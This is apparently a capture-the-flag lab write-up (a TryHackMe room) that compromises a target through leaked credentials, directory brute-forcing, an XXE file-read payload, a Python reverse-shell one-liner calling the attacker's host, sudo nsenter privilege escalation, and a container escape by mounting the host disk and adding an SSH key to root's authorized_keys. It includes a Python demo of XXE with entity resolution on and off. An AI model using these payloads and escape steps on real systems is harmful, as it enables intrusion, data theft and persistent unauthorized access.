{"app1": {"name": "online file storage"}, "app2": {"name": "media player"}, "app3": {"name": "file sync"}, "app4": {"name": "/users"}}
/users prints:
{"user": {"davelarkin": "totallysecurehuh"}}
This leaks davelarkin's SSH credentials; logging in on port 2222 yields flag4
┌──(root㉿kali)-[~/.ssh]
└─# ssh davelarkin@10.10.243.173 -p 2222
The authenticity of host '[10.10.243.173]:2222 ([10.10.243.173]:2222)' can't be established.
ECDSA key fingerprint is SHA256:D0vPRUo5EfUivVKiJf3i6JIOF50DxmKg/avxmu6bx4o.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.243.173]:2222' (ECDSA) to the list of known hosts.
davelarkin@10.10.243.173's password:
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-1037-aws x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
davelarkin@a9ef0531077f:~$ whoami
davelarkin
davelarkin@a9ef0531077f:~$ ls
api bin container4_flag.txt
davelarkin@a9ef0531077f:~$ cat container4_flag.txt
Uploading linpeas shows this is inside a Docker container.
Attacking the HTTP service on port 80
Directory brute-force
┌──(root㉿kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.243.173
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492
Output File: /root/dirsearch/reports/10.10.243.173/_21-10-28_04-15-43.txt
Error Log: /root/dirsearch/logs/errors-21-10-28_04-15-43.log
Target: http://10.10.243.173/
[04:15:44] Starting:
[04:16:50] 200 - 136B - /api
[04:16:50] 200 - 136B - /api/
[04:17:27] 200 - 2KB - /login
[04:17:28] 200 - 2KB - /login/
[04:17:29] 302 - 0B - /logout -> /login
[04:17:29] 302 - 0B - /logout/ -> /login
[04:17:52] 302 - 0B - /shell -> /login
[04:17:52] 302 - 0B - /shell/ -> /login
There are at least three paths; /shell should hold something interesting, but it redirects to /login.
/api opens normally and prints a JSON document that exposes the Apache, PHP and MySQL versions and the database name servermanager:
{"name":"Server Manager","stack":{"nginx":"Apache/2.4.41 (Ubuntu)","php":"7.4.3","mysql":{"version":"5.6","database":"servermanager"}}}
The login page source shows that on a successful login the browser is sent to a token page carrying a parameter:
<script>
$('.login').click( function(){
$.post('/api/user/login',{
'username' : $('input[name="username"]').val(),
'password' : $('input[name="password"]').val()
},function(resp){
if( resp.login ){
window.location = '/token?token=' + resp.token;
}else{
alert( resp.error );
}
});
})
</script>
Looks like a login page in front of the servermanager database; username unknown.
Continue brute-forcing under /api/user
┌──(root㉿kali)-[~/tryhackme/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.243.173/api/user
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492
Output File: /root/tryhackme/dirsearch/reports/10.10.243.173/-api-user_21-10-28_09-49-39.txt
Error Log: /root/tryhackme/dirsearch/logs/errors-21-10-28_09-49-39.log
Target: http://10.10.243.173/api/user/
[09:49:41] Starting:
[09:51:22] 200 - 53B - /api/user/login
[09:51:22] 200 - 53B - /api/user/login/
[09:51:44] 200 - 91B - /api/user/session/
[09:51:44] 200 - 91B - /api/user/session
/api/user/session/ prints:
{"active_sessions":[{"id":1,"username":"admin","hash":"1b4237f476826986da63022a76c35bb1"}]}
That fairly well confirms the username is admin.
1b4237f476826986da63022a76c35bb1 is an MD5 hash; a lookup gives the plaintext dQw4w9WgXcQ
But admin:dQw4w9WgXcQ does not log in.
what the fuck....
This odd string is exactly the id of this YouTube video:
The video is Rick Astley - Never Gonna Give You Up (Official Music Video); whether the author is telling me not to give up or hinting at something, I don't know...
Brute-forcing the admin account failed and SQL injection got nowhere. Within my experience I had used every method I knew, so at this point I could only read someone else's walkthrough : )
It turns out to be XML external entity (XXE) injection, sent through Burp Suite
payload
GET /api/user?xml HTTP/1.1
Host: 10.10.243.173
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 148
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY ac SYSTEM "php://filter/read=convert.base64-encode/resource=index.php">]>
<foo><id>&ac;</id></foo>
It returns index.php base64-encoded; decoded it reads:
<?php
include_once('../Autoload.php');
include_once('../Route.php');
include_once('../Output.php');
include_once('../View.php');
Route::load();
Route::run();
Finally, reading ../controllers/Api.php the same way reveals admin's login credential: niceWorkHackerm4n
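To see what the entity above does inside a parser, and why the page had to wrap index.php in php://filter base64, here is an added Python example using the standard library's xml.sax. It is not the room's code or the writeup's; the temporary file standing in for index.php and its contents are constructed for the demonstration. Python has processed external general entities only on request since 3.7.1, so the example switches the feature on to reproduce the vulnerable behaviour and off to show the fix.

```python
import base64
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import feature_external_ges


class IdCollector(xml.sax.ContentHandler):
    """Collects the text inside <id>, which is where the page's payload places the entity reference."""

    def __init__(self):
        super().__init__()
        self.in_id = False
        self.parts = []

    def startElement(self, name, attrs):
        self.in_id = name == "id"

    def endElement(self, name):
        if name == "id":
            self.in_id = False

    def characters(self, content):
        if self.in_id:
            self.parts.append(content)


def parse_id(xml_bytes, resolve_external):
    """Parses the document and returns the text of <id>.
    resolve_external=True is the XXE-prone configuration; False is the safe (and current default) one."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)
    handler = IdCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.parts)


def xxe_payload(path):
    """Same shape as the page's payload: an external entity 'ac' pointing at a local file."""
    return (
        b'<?xml version="1.0"?>\n'
        b'<!DOCTYPE foo [<!ENTITY ac SYSTEM "' + path.encode() + b'">]>\n'
        b"<foo><id>&ac;</id></foo>"
    )


def decode_php_filter(b64_text):
    """Undo php://filter/read=convert.base64-encode, which the page used to fetch PHP source intact."""
    return base64.b64decode(b64_text).decode()


def demo():
    """Leaks a constructed secret file through the entity, then shows the same payload with resolution off."""
    with tempfile.TemporaryDirectory() as d:
        secret = os.path.join(d, "config.txt")
        with open(secret, "w") as f:
            # Constructed content. Plain text on purpose: it contains no '<' or '&', so it parses as XML.
            f.write("DB_PASSWORD=constructed-secret-value\n")
        payload = xxe_payload(secret)
        leaked = parse_id(payload, resolve_external=True)
        blocked = parse_id(payload, resolve_external=False)
        return leaked, blocked


if __name__ == "__main__":
    leaked, blocked = demo()
    print("entities on :", repr(leaked))
    print("entities off:", repr(blocked))
```

If the referenced file contained a bare <?php tag without a matching ?>, or a stray & or <, expat would reject the external entity as not well-formed and nothing would come back. That is why the payload on the page reads index.php through php://filter/read=convert.base64-encode rather than directly; decode_php_filter above is the attacker-side half of that step.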
After logging in, enter the payload in the web shell box the target provides:
python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.13.21.169",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
Reverse shell received
└─# nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.243.173] 59426
$ ls
ls
bootstrap.min.css bootstrap.min.js index.php jquery.min.js script.js
/etc/passwd shows admin is one of the system's users; since we already know admin's password we could normally just su admin.
But this system has no su command, so use SSH to switch user instead:
ssh admin@localhost sh
www-data@6b364d3940e6:/var/www/html/public$ ssh admin@localhost sh
ssh admin@localhost sh
admin@localhost's password:
id
uid=1000(admin) gid=1000(admin) groups=1000(admin),27(sudo)
whoami
admin
Don't upgrade to a tty at this point; check admin's sudo rights with sudo -l, which shows /usr/bin/nsenter can be run without a password:
sudo -l
Matching Defaults entries for admin on 6b364d3940e6:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User admin may run the following commands on 6b364d3940e6:
(ALL) ALL
(ALL : ALL) ALL
(ALL) NOPASSWD: /usr/bin/nsenter
Escalate straight to root (with no --target and no namespace flags, nsenter simply executes /bin/sh, and sudo runs it as root):
sudo /usr/bin/nsenter /bin/sh
id
id
uid=0(root) gid=0(root) groups=0(root)
Get the flag from /root/container1_flag.txt
fdisk -l lists the partition /dev/xvda1, which should be the host's root partition.
Mount it inside the current container at /mnt/compromise (possible only because the container can see and mount the host's block device, i.e. it is running privileged):
mkdir -p /mnt/compromise
mount /dev/xvda1 /mnt/compromise
The root flag is in /mnt/compromise/root
Append the attack box's public key to root's authorized_keys on the mounted host filesystem
echo "ssh-rsa *************" >> /mnt/compromise/root/.ssh/authorized_keys
Log in to the host as root
┌──(root㉿kali)-[~/tryhackme/hackerhill]
└─# ssh root@10.10.243.173 -p 22
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-1037-aws x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri Oct 29 08:25:38 UTC 2021
System load: 0.04
Usage of /: 88.8% of 7.69GB
Memory usage: 72%
Swap usage: 37%
Processes: 205
Users logged in: 0
IPv4 address for br-9c1efeb291f3: 172.18.0.1
IPv4 address for docker0: 172.17.0.1
IPv4 address for eth0: 10.10.243.173
=> / is using 88.8% of 7.69GB
0 updates can be installed immediately.
0 of these updates are security updates.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
root@ip-10-10-243-173:~# cat /var/www/container2_flag.txt
cat: /var/www/container2_flag.txt: No such file or directory
root@ip-10-10-243-173:~# whoami
root
Search the whole filesystem for flag2
root@ip-10-10-243-173:/# find / -name container2_flag.txt
find: ‘/proc/27811’: No such file or directory
/var/lib/docker/overlay2/fb80a052499ad52a2df535ce669f4cca3b02009c751ab47752374a566ec61667/diff/var/www/container2_flag.txt
/var/lib/docker/overlay2/7149ee32cde09f7439cc3588b5f757bd6b16aaaccb59f8cf3291e8d6dc6c05db/merged/var/www/container2_flag.txt
Search the whole filesystem for flag3
root@ip-10-10-243-173:/# find / -name container3_flag.txt
find: ‘/proc/28025/task/28025/net’: Invalid argument
find: ‘/proc/28025/net’: Invalid argument
/var/lib/docker/overlay2/d38650b56ff4bbca92fe794176a3394bd05fc9d55d87341b1c0d2a54b5ae1c03/merged/home/container3_flag.txt
/var/lib/docker/overlay2/5bfb136d474f285a5a6133918e11acd8212b7559b33494e11e8c72fbe7e2f6c6/diff/home/container3_flag.txt